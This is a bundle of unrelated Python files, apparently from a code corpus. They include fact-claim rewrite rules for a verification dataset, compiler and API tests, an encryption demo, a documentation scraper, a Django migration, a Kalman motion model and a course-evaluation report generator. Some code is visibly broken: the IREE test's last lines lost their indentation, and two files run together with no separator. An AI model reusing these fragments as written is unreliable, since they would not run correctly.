            instance, "There is a person, {0}, that did not take a leading acting role in {1}.")

    def name(self):
        return "starredin2"


class StarredIn3(ReplacementRule):
    def _process(self, instance):
        return _apply_starred_in(
            instance, "There is a person, {0}, that did not appear in {1}.")

    def name(self):
        return "starredin3"


class StarredIn4(ReplacementRule):
    def _process(self, instance):
        return _apply_starred_in(
            instance, "There is a person, {0}, that had no role in {1}.")

    def name(self):
        return "starredin4"
class American(ReplacementRule):
    """'<subj> an American <rest>' -> '<subj> <rest> that originated from
    outside the United States.' with the SUPPORTS/REFUTES label flipped."""

    def _process(self, instance):
        if instance["label"] == "NOT ENOUGH INFO":
            return None
        match = re.match(r"(.+) an American (.+)", instance["claim"])
        if match is None:
            return None
        # Strip periods from both halves before re-assembling the claim.
        prefix = match.group(1).replace(".", "")
        remainder = match.group(2).replace(".", "")
        instance["claim"] = "{0} {1} that originated from outside the United States.".format(prefix, remainder)
        instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
        return instance

    def name(self):
        return "american"
def _entity_rewrite(instance, pattern, place_template, time_template):
    """Rewrite a biographical claim according to its named entities.

    *pattern* must expose group 1 (the person) and group 2 (the place or
    date phrase).  The full claim is run through the module-level spaCy
    pipeline: when it contains a location entity (GPE/LOC) and no temporal
    entity, *place_template* is used; when it contains a temporal entity
    (TIME/DATE/ORDINAL/CARDINAL) and no location, *time_template* is used;
    ambiguous or entity-free claims are skipped.  Templates are formatted
    with {0} = person and {1} = place-or-date, both with periods stripped.
    The SUPPORTS/REFUTES label is flipped; returns None when the rule does
    not apply (NOT ENOUGH INFO, no match, or ambiguous entities).
    """
    if instance["label"] == "NOT ENOUGH INFO":
        return None
    match = re.match(pattern, instance["claim"])
    if match is None:
        return None
    doc = nlp(instance["claim"])
    is_place = any(e.label_ in ["GPE", "LOC"] for e in doc.ents)
    is_time = any(e.label_ in ["TIME", "DATE", "ORDINAL", "CARDINAL"] for e in doc.ents)
    if is_place and not is_time:
        template = place_template
    elif is_time and not is_place:
        template = time_template
    else:
        return None
    instance["claim"] = template.format(
        match.group(1).replace(".", ""), match.group(2).replace(".", ""))
    instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
    return instance


# Birth pattern allows a bare 'born <X>' (the in/on is optional); the death
# pattern requires the preposition — kept exactly as in the original rules.
_BORN_RE = r"(.+) (?:was|is) born (?:in|on)? (.+)"
_DIED_RE = r"(.+) died (?:in|on) (.+)"


class Birth1(ReplacementRule):
    def _process(self, instance):
        return _entity_rewrite(
            instance, _BORN_RE,
            "There exists a place, {1}, that was not the birthplace of the person {0}.",
            "{1} is not the approximate time at which the person {0} was born.")

    def name(self):
        return "birth1"


class Birth2(ReplacementRule):
    def _process(self, instance):
        return _entity_rewrite(
            instance, _BORN_RE,
            "There exists a place, {1}, that is not where the person {0} started living.",
            "{1} is not the approximate time at which the person {0} started living.")

    def name(self):
        return "birth2"


class Birth3(ReplacementRule):
    def _process(self, instance):
        return _entity_rewrite(
            instance, _BORN_RE,
            "{0} was born in some other place than {1}.",
            "{0} was born at some other time than {1}.")

    def name(self):
        return "birth3"


class Birth4(ReplacementRule):
    def _process(self, instance):
        return _entity_rewrite(
            instance, _BORN_RE,
            "{1} is some place other than where the person {0} was born.",
            "{1} is some other time than when {0} was born.")

    def name(self):
        return "birth4"


class Death1(ReplacementRule):
    def _process(self, instance):
        return _entity_rewrite(
            instance, _DIED_RE,
            "{1} is somewhere other than the place where the person {0} became deceased.",
            "{1} is some other time than when the person {0} became deceased.")

    def name(self):
        return "death1"


class Death2(ReplacementRule):
    def _process(self, instance):
        return _entity_rewrite(
            instance, _DIED_RE,
            "There exists a place, {1}, that is not the place where the person {0} died.",
            # NOTE(review): "the when" reads like a typo, but the string is
            # kept byte-for-byte because generated claims feed downstream
            # scoring runs.
            "{1} is not the when the person {0} died.")

    def name(self):
        return "death2"


class Death3(ReplacementRule):
    def _process(self, instance):
        return _entity_rewrite(
            instance, _DIED_RE,
            "There exists a place, {1}, that is not the place where the person {0} took their final breath.",
            "{1} is not the approximate time at which the person {0} took their final breath.")

    def name(self):
        return "death3"
class ClaimRewriter:
    """Applies every ReplacementRule to incoming claims and streams the
    results to per-rule JSONL files under *out_dir*."""

    def __init__(self, out_dir):
        # One instance of each rewrite rule; the rules are independent and
        # every rule is tried against every claim.
        self.replacement_rules = [IsAReplacementRule1(),
                                  IsAReplacementRule2(),
                                  IsAReplacementRule3(),
                                  IsAReplacementRule4(),
                                  IsAReplacementRule5(),
                                  WasAReplacementRule1(),
                                  WasAReplacementRule2(),
                                  WasAReplacementRule3(),
                                  WasAReplacementRule4(),
                                  WasAReplacementRule5(),
                                  DirectedBy1(),
                                  DirectedBy2(),
                                  DirectedBy3(),
                                  DirectedBy4(),
                                  DirectedBy5(),
                                  American(),
                                  Birth1(),
                                  Birth2(),
                                  Birth3(),
                                  Birth4(),
                                  Death1(),
                                  Death2(),
                                  Death3()
                                  ]
        # Per-rule output handles, held open for the process lifetime.
        # NOTE(review): the handles are never explicitly closed — acceptable
        # for a one-shot script, but use contextlib.ExitStack if this class
        # is ever reused in a long-running context.
        self.changed_files = {rule:open(out_dir+"/changed."+rule.name()+".jsonl","w+") for rule in self.replacement_rules}
        self.unchanged_files = {rule:open(out_dir+"/unchanged."+rule.name()+".jsonl","w+") for rule in self.replacement_rules}

    def process_claim(self, claim):
        """Try every rule on *claim*; each rule that fires appends the
        original claim to its 'unchanged' file and the rewritten copy to
        its 'changed' file (deepcopy keeps *claim* pristine between rules)."""
        for rule in self.replacement_rules:
            rep_claim = rule.process_instance(deepcopy(claim))
            if rep_claim is not None:
                self.unchanged_files[rule].write(json.dumps(claim)+"\n")
                self.changed_files[rule].write(json.dumps(rep_claim)+"\n")
# Stream every claim in the input JSONL through all rewrite rules.
with open(args.in_file) as f:
    rewriter = ClaimRewriter(args.out_dir)
    for line in tqdm(f):
        line = json.loads(line)
        rewriter.process_claim(line)
# The generated shell script refers to outputs by the directory basename.
out_dir_name = args.out_dir.split("/")[-1]
# Emit a companion script that (1) runs the oracle pipeline, (2) runs the
# full pipeline, then (3) runs both scoring passes, over every per-rule
# changed/unchanged file pair.
with open("generated3.sh","w+") as f:
    for rule in rewriter.replacement_rules:
        f.write("bash scripts/run_oracle.sh {0} changed.{1}.jsonl".format(out_dir_name, rule.name()))
        f.write("\n")
        f.write("bash scripts/run_oracle.sh {0} unchanged.{1}.jsonl".format(out_dir_name, rule.name()))
        f.write("\n")
    for rule in rewriter.replacement_rules:
        f.write("bash scripts/run_full.sh {0} changed.{1}.jsonl".format(out_dir_name, rule.name()))
        f.write("\n")
        f.write("bash scripts/run_full.sh {0} unchanged.{1}.jsonl".format(out_dir_name, rule.name()))
        f.write("\n")
    # Scoring commands append to oracle_scores / full_scores, each preceded
    # by an echo line labelling the result.
    for rule in rewriter.replacement_rules:
        f.write("echo {0} changed.oracle.{1} >> oracle_scores".format(out_dir_name, rule.name()))
        f.write("\n")
        f.write("bash scripts/run_scoring_oracle.sh {0} changed.{1}.jsonl >> oracle_scores".format(out_dir_name, rule.name()))
        f.write("\n")
        f.write("echo {0} unchanged.oracle.{1} >> oracle_scores".format(out_dir_name, rule.name()))
        f.write("\n")
        f.write("bash scripts/run_scoring_oracle.sh {0} unchanged.{1}.jsonl >> oracle_scores".format(out_dir_name, rule.name()))
        f.write("\n")
    for rule in rewriter.replacement_rules:
        f.write("echo {0} changed.full.{1} >> full_scores".format(out_dir_name, rule.name()))
        f.write("\n")
        f.write("bash scripts/run_scoring_full.sh {0} changed.{1}.jsonl >> full_scores".format(out_dir_name, rule.name()))
        f.write("\n")
        f.write("echo {0} unchanged.full.{1} >> full_scores".format(out_dir_name, rule.name()))
        f.write("\n")
        f.write("bash scripts/run_scoring_full.sh {0} unchanged.{1}.jsonl >> full_scores".format(out_dir_name, rule.name()))
        f.write("\n")
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
import tempfile
import unittest
# TODO: No idea why pytype cannot find names from this module.
# pytype: disable=name-error
from pyiree.compiler2.tf import *
# Skip the whole module (exit 0, not a failure) when the IREE TensorFlow
# compiler backend is not installed in this environment.
if not is_available():
    print(f"Skipping test {__file__} because the IREE TensorFlow compiler "
          f"is not installed")
    sys.exit(0)
import tensorflow as tf
class SimpleArithmeticModule(tf.Module):
    """Tiny tf.Module with two concrete functions used as compiler input."""

    @tf.function(input_signature=[
        tf.TensorSpec([4], tf.float32),
        tf.TensorSpec([4], tf.float32)
    ])
    def simple_mul(self, a, b):
        # Elementwise product of two length-4 float32 vectors.
        return a * b

    @tf.function(input_signature=[
        tf.TensorSpec([128, 3072], tf.float32),
        tf.TensorSpec([3072, 256], tf.float32),
    ])
    def simple_matmul(self, a, b):
        # (128, 3072) @ (3072, 256) float32 matrix product.
        return tf.matmul(a, b)
# TODO(laurenzo): More test cases needed (may need additional files).
# Specifically, figure out how to test v1 models.
class TfCompilerTest(tf.test.TestCase):
    """End-to-end checks of the IREE TF compiler Python API against a
    saved copy of SimpleArithmeticModule."""

    def testImportSavedModel(self):
        # import_only=True returns the imported MLIR as bytes without
        # running the rest of the compilation pipeline.
        import_mlir = compile_saved_model(self.smdir,
                                          import_only=True).decode("utf-8")
        self.assertIn("func @simple_matmul", import_mlir)

    def testCompileSavedModel(self):
        # Full compilation of the on-disk saved model to a binary.
        binary = compile_saved_model(self.smdir,
                                     target_backends=DEFAULT_TESTING_BACKENDS)
        logging.info("Compiled len: %d", len(binary))
        # Exported function names should survive into the compiled output.
        self.assertIn(b"simple_matmul", binary)
        self.assertIn(b"simple_mul", binary)

    def testCompileModule(self):
        # Compile directly from the in-memory tf.Module instance.
        binary = compile_module(self.m, target_backends=DEFAULT_TESTING_BACKENDS)
        logging.info("Compiled len: %d", len(binary))
        self.assertIn(b"simple_matmul", binary)
        self.assertIn(b"simple_mul", binary)

    @classmethod
    def setUpClass(cls):
        # Save the module once for the whole class into a temp directory;
        # save_debug_info preserves source locations for diagnostics.
        cls.m = SimpleArithmeticModule()
        cls.tempdir = tempfile.TemporaryDirectory()
        cls.smdir = os.path.join(cls.tempdir.name, "arith.sm")
        tf.saved_model.save(
            cls.m,
            cls.smdir,
            options=tf.saved_model.SaveOptions(save_debug_info=True))

    @classmethod
    def tearDownClass(cls):
        # Remove the temporary saved-model directory.
        cls.tempdir.cleanup()
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
tf.test.main()
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from mo.utils.error import classify_error_type
class TestingErrorClassifier(unittest.TestCase):
    """Checks classify_error_type's recognition of importer error strings."""

    def _assert_classified_as(self, message, expected):
        """Classify *message* and compare the result against *expected*."""
        self.assertEqual(classify_error_type(message), expected)

    def test_no_module(self):
        # A genuine "No module named ..." error is returned verbatim.
        message = "No module named 'openvino.offline_transformations.offline_transformations_api'"
        self._assert_classified_as(message, message)

    def test_no_module_neg(self):
        # Similar text without the exact wording is not recognised.
        self._assert_classified_as("No module 'openvino'", "undefined")

    def test_cannot_import_name(self):
        # "cannot import name ..." errors are trimmed to the name part.
        message = "cannot import name 'IECore' from 'openvino.inference_engine' (unknown location)"
        self._assert_classified_as(message, "cannot import name 'IECore'")

    def test_cannot_import_name_neg(self):
        # Missing the leading "cannot" keyword -> unclassified.
        message = "import name 'IECore' from 'openvino.inference_engine' (unknown location)"
        self._assert_classified_as(message, "undefined")
|
import requests
from unittest import TestCase
from . import BASE_URL, test_token, test_config
url = BASE_URL + '/snapshot/add'
class TestAddSnapshot(TestCase):
    """Integration tests for POST /snapshot/add (requires a live service)."""

    def test_post_working(self):
        """
        A valid token and config should create a snapshot successfully.
        """
        payload = {
            "token": test_token,
            "config": test_config
        }
        output = requests.post(url, json=payload)
        expected_output = 'snapshot created successfully'
        assert output.json()['message'] == expected_output

    def test_post_missing_parameter(self):
        """
        A misspelled 'token' key must be rejected as a missing parameter.
        """
        payload = {
            "tokfadsfasden": test_token,
            "config": test_config
        }
        output = requests.post(url, json=payload)
        # presumably the service's "missing parameter" error code (string,
        # not int) — confirm against the API definition.
        expected_status = '531'
        assert output.json()['error']['status'] == expected_status

    def test_post_user_unidentified(self):
        """
        An unknown token must be rejected as an unidentified user.
        """
        payload = {
            "token": 'toto',
            "config": test_config
        }
        output = requests.post(url, json=payload)
        # presumably the "user unidentified" error code — confirm.
        expected_status = '539'
        assert output.json()['error']['status'] == expected_status
|
from ecies.utils import generate_eth_key, generate_key
from ecies import encrypt, decrypt

# Demo of ECIES encrypt/decrypt round-trips with two key flavours.

# 1) Ethereum-style key, hex-encoded strings for both keys.
eth_k = generate_eth_key()
sk_hex = eth_k.to_hex()  # hex string
pk_hex = eth_k.public_key.to_hex()  # hex string
data = b'this is a test'
encrypt_str = encrypt(pk_hex, data)
print(encrypt_str)
# Decrypting with the matching private key should recover `data`.
decrypt_str = decrypt(sk_hex, encrypt_str)
print(decrypt_str)

# 2) Raw secp256k1 key, byte-encoded (format(True) = compressed pubkey).
secp_k = generate_key()
sk_bytes = secp_k.secret  # bytes
pk_bytes = secp_k.public_key.format(True)  # bytes
encrypt_str = encrypt(pk_bytes, data)
print(encrypt_str)
decrypt_str = decrypt(sk_bytes, encrypt_str)
print(decrypt_str)
|
#!/usr/bin/python3
# Copyright 2018-2019 Leland Lucius
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import json
import os
import sys
from lxml import etree
from selenium import webdriver
# Should be within the "z/VM: Systems Management Application Programming" guide
URL = "https://www.ibm.com/support/knowledgecenter/en/SSB27U_7.1.0/com.ibm.zvm.v710.dmse6/sok.htm"

# Refresh saved copies of pages if asked
if len(sys.argv) > 1 and sys.argv[1] == "refresh":
    # Use the (deprecated) PhantomJS driver for now...it's the easiest by far
    driver = webdriver.PhantomJS()

    # Get the list of functions
    driver.get(URL)

    # Extract the function names and the links to their documentation pages
    fns = {}
    items = driver.find_elements_by_xpath("//li[@title='Socket Application Programming Interfaces']/ul[@role='group']/li[contains(@class, 'kc-toc-item')]//a")
    for a in items:
        fns[a.get_attribute("aria-label").strip()] = a.get_attribute("href").strip()

    # Fetch each page and save its content frame locally
    for fn, href in fns.items():
        print(f"Getting {fn}")
        driver.get(href)
        driver.switch_to.frame("kcframe")
        # BUG FIX: use a context manager so the handle is closed
        # deterministically (the original leaked one open file per page).
        with open(f"content/{fn}", "w") as out:
            out.write(driver.page_source)

# Must use the HTML parser
parser = etree.HTMLParser()


def gettext(node):
    """Assemble the text fragments of *node* and all of its children.

    Fragments that start the string or follow whitespace are wrapped in
    single quotes; the result is whitespace-collapsed, double quotes are
    turned into single quotes, trailing periods are stripped, and a fully
    quoted result has its surrounding quotes removed.
    """
    t = ""
    tails = []
    # Scan node and all children for text
    for e in node.iter():
        if e.text is None and e.tail is None:
            pass
        elif e.text is None and e.tail is not None:
            tails.append(e.tail)
        elif e.text is not None and e.tail is None:
            # Quote fragment if it falls at the start of the text or
            # accumulated text ends with whitespace
            if not t or (t and t[-1] in [" ", "\n"]):
                t += f"'{e.text}'"
            else:
                t += e.text
            if len(tails) > 1:
                t += tails.pop()
        elif e.text is not None and e.tail is not None:
            # Quote fragment if the accumulated text ends with whitespace
            if t and t[-1] in [" ", "\n"]:
                t += f"'{e.text}'"
            else:
                t += e.text
            tails.append(e.tail)
    # Append any remaining fragments to accumulated text
    if len(tails) > 0:
        t += "".join(tails)
    t = " ".join(t.replace("\n", " ").replace('"', "'").split()).strip(".")
    # Get rid of quotes if entire text is quoted
    if t and t[0] == "'" and t[-1] == "'":
        t = t.strip("'")
    return t


db = {}

# Process the saved pages
for path in glob.glob("content/*"):
    # BUG FIX: close the page file once parsed (the original leaked it).
    with open(path) as page:
        root = etree.parse(page, parser)

    # Locate the "Return and Reason Code" header and navigate to its parent
    e = root.xpath("//section/h2[text()='Return and Reason Codes']")
    p = e[0].getparent()

    # Extract the function name from the path
    fn = os.path.basename(path).split(".")[0]
    print(f"Processing {fn}")

    # Locate all rows within the section
    rows = p.xpath(".//tr")

    # rc/rs carry forward across rows whose cells are blank (rowspan tables)
    rc = None
    rs = None
    et = None
    db[fn] = {}

    # process each row
    for row in rows:
        # Locate all the columns; skip header rows with no <td> cells
        cols = row.xpath("./td")
        if len(cols) == 0:
            continue

        # Get the return code or reuse the previous one if this column is blank
        tc = gettext(cols[0])
        if tc != "":
            rc = tc

        # Get the reason code or reuse the previous one if this column is blank;
        # non-numeric reason text collapses to an empty suffix.
        tc = gettext(cols[2])
        if tc != "":
            rs = f"_{tc}" if tc.isdigit() else ""

        # Get the message text
        et = gettext(cols[4])

        # Store it in the DB.
        # NOTE(review): if the first data row had a blank reason column, rs
        # would still be None and the key would read e.g. "8None" -- confirm
        # the source tables always populate the first row.
        db[fn][f"{rc}{rs}"] = et

s = json.dumps(db, indent=4)
print(s)

with open("pysmapi/messages.py", "w") as f:
    f.write(f"# Automatically generated by {os.path.basename(sys.modules[__name__].__file__)}\n\n")
    f.write(f"msgdb = \\\n")
    f.write(s)
|
# Generated by Django 3.1.7 on 2021-06-16 16:37
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the ``Config`` model and its indexes.

    Auto-generated by Django 3.1.7 -- avoid hand-editing the operations
    once this migration has been applied anywhere.
    """

    # First migration in this app's history.
    initial = True

    dependencies = [
    ]

    operations = [
        # A Config row pairs an app label with a command/config name plus an
        # enabled flag (presumably used to toggle management commands -- the
        # consuming code is not visible here).
        migrations.CreateModel(
            name='Config',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('app', models.TextField()),
                ('name', models.TextField()),
                ('is_enabled', models.BooleanField(default=True)),
            ],
            options={
                # Explicit table name instead of the default app_model form.
                'db_table': 'django_command_disable',
                'ordering': ('app', 'name'),
            },
        ),
        # Single-column indexes for the three lookup fields.
        migrations.AddIndex(
            model_name='config',
            index=models.Index(fields=['app'], name='django_comm_app_4f7ac8_idx'),
        ),
        migrations.AddIndex(
            model_name='config',
            index=models.Index(fields=['name'], name='django_comm_name_b1047f_idx'),
        ),
        migrations.AddIndex(
            model_name='config',
            index=models.Index(fields=['is_enabled'], name='django_comm_is_enab_1cfeb4_idx'),
        ),
    ]
|
"""
"""
# Build In
from argparse import ArgumentParser
# Installed
import numpy as np
# Local
from . import Model, MOTION_MODELS
def init_constant_accumulation_parser(parents=None):
    """Build the ArgumentParser for the Constant Accumulation model options.

    :param parents: optional list of parent ArgumentParsers to inherit
        arguments from (default: none).
    :return: a configured ArgumentParser.
    """
    # BUG FIX: the original used the mutable default ``parents=[]``; use the
    # None-sentinel idiom instead (behaviour is unchanged for all callers).
    parser = ArgumentParser(
        parents=[] if parents is None else parents,
        description='Arguments for a Constant Accumulation model'
    )
    # State/measurement dimensions and the index tuples that wire position,
    # velocity, acceleration and rotation components together.
    parser.add_argument('--x_dim', type=int, metavar='INT', default=4)
    parser.add_argument('--z_dim', type=int, metavar='INT', default=2)
    parser.add_argument('--pos_idx', type=int, metavar='TUPLE', nargs='*', default=(0,1))
    parser.add_argument('--vel_idx', type=int, metavar='TUPLE', nargs='*', default=(2,3))
    parser.add_argument('--acl_idx', type=int, metavar='TUPLE', nargs='*', default=None)
    parser.add_argument('--rot_idx', type=int, metavar='TUPLE', nargs='*', default=None)
    parser.add_argument('--template', type=str, metavar='STRING', default='KalmanTracker')
    # Fixed coupling gains for the transition matrix.
    parser.add_argument('--vel', type=float, metavar='FLOAT', default=1.0)
    parser.add_argument('--acl', type=float, metavar='FLOAT', default=0.125)
    parser.add_argument('--rot', type=float, metavar='FLOAT', default=0.0)
    return parser
class ConstantAccumulation(Model):
    """Motion model whose transition matrix accumulates coupled state
    components (position from velocity, optionally velocity from
    acceleration/rotation) with fixed gains, for use by a Kalman-style
    tracker template.
    """
    def __init__(self, parse=None, **kwargs):
        """Configure the model from CLI-style tokens and/or keyword args.

        :param parse: optional list of CLI tokens; when non-empty they are
            parsed with init_constant_accumulation_parser and merged with
            **kwargs (explicit kwargs win).
        :param kwargs: direct configuration values (see parse_kwargs).
        """
        def parse_kwargs(
            x_dim=3,
            z_dim=1,
            pos_idx=(0,),
            vel_idx=(1,),
            rot_idx=None,
            acl_idx=None,
            vel=1.0,
            acl=0.125,
            rot=0.0,
            prediction_model='KalmanTracker',
            label=None,
            **kwargs
        ):
            # NOTE(review): the CLI parser exposes '--template' but this
            # function reads 'prediction_model'; a parsed template value is
            # silently swallowed by **kwargs. Both default to 'KalmanTracker',
            # so they agree only by coincidence -- confirm intent.
            self.label = label
            self.x_dim = x_dim  # state vector size
            self.z_dim = z_dim  # measurement vector size
            self.u_dim = 0      # no control input
            self.F = np.eye(x_dim)         # state transition matrix
            self.H = np.eye(z_dim, x_dim)  # measurement matrix
            # Initial covariance: large, and much larger for the
            # unobserved (beyond z_dim) state components.
            self.P = np.eye(x_dim) * 10
            self.P[z_dim:] *= 1000
            # Process noise, damped for the unobserved components.
            self.Q = np.eye(x_dim)
            self.Q[z_dim:] *= 0.015625
            self.prediction_model = prediction_model
            self.motion_model = 'ConstantAccumulation'
            # Couple state components in F with the configured fixed gains
            # (e.g. position accumulates vel * velocity each step).
            if vel_idx:
                self.F[pos_idx, vel_idx] = vel
            if acl_idx:
                self.F[vel_idx, acl_idx] = acl
            if rot_idx:
                self.F[vel_idx, rot_idx] = rot
            pass
        if parse is not None and len(parse):
            # Parse the tokens, then let explicit kwargs override the result.
            parser = init_constant_accumulation_parser()
            args, _ = parser.parse_known_args(parse)
            for k,v in kwargs.items():
                args.__setattr__(k,v)
            parse_kwargs(**args.__dict__)
        else:
            parse_kwargs(**kwargs)
        pass
    pass
# Register the model in the global registry so it can be looked up by name.
MOTION_MODELS['ConstantAccumulation'] = ConstantAccumulation
#!/usr/bin/env python
from __future__ import division, print_function
import argparse,sys,os
import random
from collections import Counter
from matplotlib import pyplot as plt
import wordcloud
from wordcloud import WordCloud
import pandas as pd, numpy as np
from IPython.display import display, HTML
from weasyprint import HTML as weasyHTML
def is_nan(x):
    """Return True if *x* is a float NaN; False for values np.isnan rejects.

    np.isnan raises TypeError for non-numeric input (e.g. strings), which we
    treat as "not NaN".
    """
    try:
        return np.isnan(x)
    except TypeError:  # BUG FIX: was a bare except, which also swallowed
        return False   # KeyboardInterrupt/SystemExit; only TypeError is expected
def reformat_answer(answer):
    """Coerce an answer cell to text; a NaN (missing) cell becomes a stock phrase."""
    # pandas represents missing spreadsheet cells as NaN.
    return 'No answer given.' if is_nan(answer) else str(answer)
def reformat_question(question, instructor_name):
    """Fill in the instructor's name and scrub non-breaking spaces."""
    text = question.replace("[InstructorName]", instructor_name)
    if u'\xa0' not in text:
        return text
    # Non-breaking spaces leak in from the spreadsheet encoding.
    return text.replace(u'\xa0', u' ')
# from itertools docs
def random_permutation(iterable, r=None):
    """Random selection from itertools.permutations(iterable, r)."""
    pool = tuple(iterable)
    if r is None:
        r = len(pool)
    # sample() without replacement is equivalent to drawing one permutation.
    return tuple(random.sample(pool, r))
# Stylesheet embedded verbatim into the generated HTML report: the headline
# banner, per-student name/question/answer paragraphs, and the optional
# word-count table.
css = """
p.large-headline {
font-family: times, Times New Roman, times-roman, georgia, serif;
color: #444;
margin: 0px 0px 100px 0px;
padding: 40px 40px 40px 40px;
font-size: 55px;
line-height: 44px;
letter-spacing: -1px;
font-weight: bold;
text-align: center;
border-radius: 25px;
border: 2px solid #111;
width: 90%;
}
p.medium-headline {
font-family: times, Times New Roman, times-roman, georgia, serif;
color: #444;
margin: 0px -10px 0px 0px;
padding: 0px 0px 0px 0px;
font-size: 25px;
line-height: 24px;
letter-spacing: -1px;
font-weight: bold;
text-align: left;
}
p.name {
font-family: times, Times New Roman, times-roman, georgia, serif;
font-weight: bold;
font-size: 20px;
margin-top: 2em;
margin-bottom: 0em;
}
p.question {
font-family: times, Times New Roman, times-roman, georgia, serif;
font-size: 16px;
color: #111;
font-weight: bold;
margin-top: 0em;
margin-bottom: 0em;
width: 90%;
}
p.answer {
font-family: times, Times New Roman, times-roman, georgia, serif;
font-size: 14px;
color: #111;
text-align: justify;
margin-top: 0em;
margin-bottom: 0em;
width: 90%;
}
table
{
border-collapse: collapse;
}
th
{
color: #ffffff;
background-color: #000000;
}
td
{
background-color: #cccccc;
}
table, th, td
{
font-family:Arial, Helvetica, sans-serif;
border: 1px solid black;
text-align: right;
}
"""
def generatepdf(xl_filename,removeintermediate=False,verbose=False,include_word_count=False,order='forward',stopwords=wordcloud.STOPWORDS,css=css,collate='bystudent'):
    """Build an HTML report, a word-cloud PNG and a PDF from an evaluation export.

    :param xl_filename: path to the .xlsx export; must contain 'RawData' and
        'QuestionMapper' sheets.
    :param removeintermediate: delete the intermediate HTML/PNG after the PDF
        has been written.
    :param verbose: print extra debugging output.
    :param include_word_count: embed a "most common words" table in the report.
    :param order: 'forward', 'reverse' or 'random' ordering of student answers
        (only used when collate='bystudent').
    :param stopwords: words excluded from the word cloud and word count.
    :param css: stylesheet embedded into the HTML report.
    :param collate: 'bystudent' (one section per student) or 'byquestion'
        (one section per question).
    """
    base = os.path.splitext(xl_filename)[0] + '_' + collate
    pdf_filename = base + '.pdf'
    html_filename = base + '.html'
    wc_filename = base + '-wordcloud.png'
    print("I will write out the following files: {p} {h} {w}".format(p=pdf_filename,
                                                                     h=html_filename,
                                                                     w=wc_filename))
    if removeintermediate:
        print("But I will delete {h} and {w}.".format(h=html_filename,
                                                      w=wc_filename))
    # NOTE(review): 'sheetname' was renamed 'sheet_name' in pandas 0.21 and
    # removed in 1.0; kept as-is for the old pandas this script targets.
    answers = pd.io.excel.read_excel(xl_filename, sheetname='RawData')
    questionmap = pd.io.excel.read_excel(xl_filename, sheetname='QuestionMapper')
    # Normalize the data ever so slightly: some versions had "Question 1" and
    # others "Question_1", some internally inconsistent. Make it underscores.
    answers.columns = [i.replace(' ', '_') for i in answers.columns]
    questionmap['Column'] = [i.replace(' ', '_') for i in questionmap['Column']]
    # Ordered list of full question texts; order drives the report layout.
    questions = questionmap["Question"].values
    # qm maps a column label like "Question_1" to the full question text.
    qm = {}
    for (idx, qd) in questionmap.iterrows():
        qm[qd['Column']] = qd['Question']
    if verbose:
        print(qm)
    # Course-level data is repeated on every row; read it from the first.
    course_code = answers.CourseCode[0]
    course_title = answers.CourseTitle[0]
    instructor_name = answers.InstructorName[0]
    enrollments = answers.Enrollments[0]
    # Columns that are deliberately not per-student answers.
    knownskips = ['Path', 'CourseCode', 'CourseTitle', 'UniqueID', 'InstructorName', 'Enrollments']
    # a[row_index][question_text] -> that student's (possibly NaN) answer.
    a = {}
    for (idx, student) in answers.iterrows():
        a[idx] = {}
        for colname in answers.columns:
            if colname in qm:
                a[idx][qm[colname]] = student[colname]
            elif colname not in knownskips:
                print("Could not find", colname)
    if verbose:
        print(a[0][questions[0]])
    html = '''
<html>
<head>
<style>
{css}
</style>
</head>
<body>
<div>
<p class="large-headline">{title}</p>
<p class="medium-headline">{code}<br>{instructor}<br>Answers from {a} of {b} enrolled students</p>
'''.format(css=css,
           title=course_title, code=course_code, instructor=instructor_name,
           a=len(a), b=enrollments
           )
    html += '''<div class="content-analysis"><img src="{wc}" style="width:720px;height:560px;"/>'''.format(wc=os.path.split(wc_filename)[-1])
    # BUG FIX: the original built the word-count table here from the Counter
    # `c`, which is only assigned near the end of the function -- an
    # UnboundLocalError whenever include_word_count=True. Insert a placeholder
    # now and substitute the finished table once the counter exists.
    wordcount_token = '<!--WORD-COUNT-TABLE-->'
    if include_word_count:
        html += wordcount_token
    html += '''</div>\n'''
    answertext = ''
    if collate == 'byquestion':
        for (idx, qd) in questionmap.iterrows():
            qn = qd['Column']
            if idx == 8:
                # This is the 'what is your name' question
                continue
            qt = reformat_question(qd['Question'], instructor_name)
            these_answers = answers[qn]
            html += '''<div class="response">
<p class="name">Question: {q}</p>
'''.format(q=qt)
            for (ii, answer) in enumerate(these_answers):
                answer = reformat_answer(answer)
                html += '''<p class="answer"><b>Student {i} ({n}): </b>{a}</p>
'''.format(a=answer, i=ii + 1,
           n=reformat_answer(answers['Question_9'][ii]))
                answertext = answertext + ' ' + answer
            html += '</div>\n'
    elif collate == 'bystudent':
        orderedanswers = sorted(a)
        if order == 'reverse':
            orderedanswers = reversed(orderedanswers)
        elif order == 'random':
            orderedanswers = random_permutation(orderedanswers)
        for idx in orderedanswers:
            # NOTE: assumes the student's name is question 9 (index 8).
            html += '''<div class="response">
<p class="name">Student {i} ({n})</p>
'''.format(
                i=idx + 1, n=reformat_answer(a[idx][questions[8]])
            )
            # The loop below includes the name question again; removing it
            # would require matching the name question robustly both here and
            # above (it sits before instructor-added custom questions), so
            # the repetition is kept for now.
            for question in questions:
                question_cor_name = reformat_question(question, instructor_name)
                answer = reformat_answer(a[idx][question])
                answertext = answertext + ' ' + answer
                html += '''<p class="question">{q}</p>
<p class="answer">{a}</p>
'''.format(q=question_cor_name, a=answer)
            html += '</div>\n'
    # Word cloud over all concatenated answer text. (Renamed from the
